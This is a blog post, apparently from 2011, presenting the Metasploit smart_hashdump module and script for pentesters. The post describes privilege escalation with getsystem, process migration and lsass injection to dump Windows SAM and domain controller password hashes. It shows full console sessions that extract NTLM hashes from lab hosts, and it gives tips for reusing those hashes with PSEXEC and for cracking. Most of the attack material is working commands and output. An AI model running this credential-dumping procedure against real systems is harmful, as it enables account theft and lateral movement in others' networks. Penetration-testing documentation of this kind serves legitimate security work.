Shell is only the Beginning

A couple of months ago I was asked by the NWN guys from the pentest team to help them automate dumping windows hashes depending on the role and privilege level, for them I wrote hashdump2 a Meterpreter Script to automate what back then was required. Mubix this week wrote a blog post on his experience and process for when dumping hashes on x64 systems, specially Windows 2008 R2 Domain Controllers. I re-wrote the hashdump2 script and added the logic that Mubix came up with plus added the ability to escalate privileges using the getsystem API call and reworked the logic of the script and ported the result to a post module both called smart_hashdump. The way the module and script works is as follows

• It first checks the Privilege Level and OS.
• It will check if the target is a Domain Controller.
• Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
• If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
• If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
• On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method.

Script:

meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on 
privilage level, OS and Role of host.
OPTIONS:
    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump 
msf post(smart_hashdump) > info
       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch: 
       Rank: Normal
Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
Description:
  This will dump local accounts from the SAM Database and if the 
  targets host is a Domain Controller the Domain Account Database 
  using the proper technique depending on privilage level, OS and Role 
  of host.
msf post(smart_hashdump) > show options 
Module options (post/windows/gather/smart_hashdump):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages so lets use the post module since it is what most of the code is moving to, first lets run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::

On a Windows 7 System with UAC Disabled as Administrator:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::

on a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly UAC does a good job at blocking dumping the hashes even as Administrator, it will even block getsystem.

on a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds 
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

If you are going to use those hashes in PSEXEC and for cracking remember to filter the Guest, SUPPORT_* and HelpAssistant accounts since typically they are disabled. On the Domain Controller the account with the hostname$ is the Active Directory Recovery Account many time the same as the Domain Admin Account and it can not be used remotely.

I included the creation of a loot file with the hashes for 2 reasons

1. It saves the SID of the account so as to identify the accounts and be able to use those if needed.
2. Some times you do not have a Database attached or delete a workspace by accident.
   

Script Download

Module Download

Update on Wednesday, June 1, 2011 at 8:00AM by Carlos Perez

One of the things I found while dumping hashes in Windows 2008 x64 is that only the first Administrator account (RID 500) on the DC is the one that has the admin token by default, other accounts even if they are Domain Admins and are given privelages to administer the local server that is the DC do not have this token by default and must eleveate privelages to be able to migrate in to another process running as SYSTEM, that is why the module will check for the presense of this token using the is_admin? API call before attempting to migrate. Another thing to take in to consideration hashdump has a bug where it is introducing bytes in to the password field and the account name, this caused the insertion in to the database to fail, so the post module will now normalize this data as much as possible, still a small percentage will have a space or rando alpha numeric charecter. When you are dumping hashes on a Non-Englisg system do take in to account that accented charecters as usernames will cause the insertion into the database to also failed so those will be normalized also. There are plans for a full re-write of the hashdump code since it is quite old. Remember for Domain Controllers the inject method has to be used do to that the accounts are not in the registry but in an encrypted database call NTDS.dit while on a regular host these are stored on the registry and that is why the registry read method is prefered.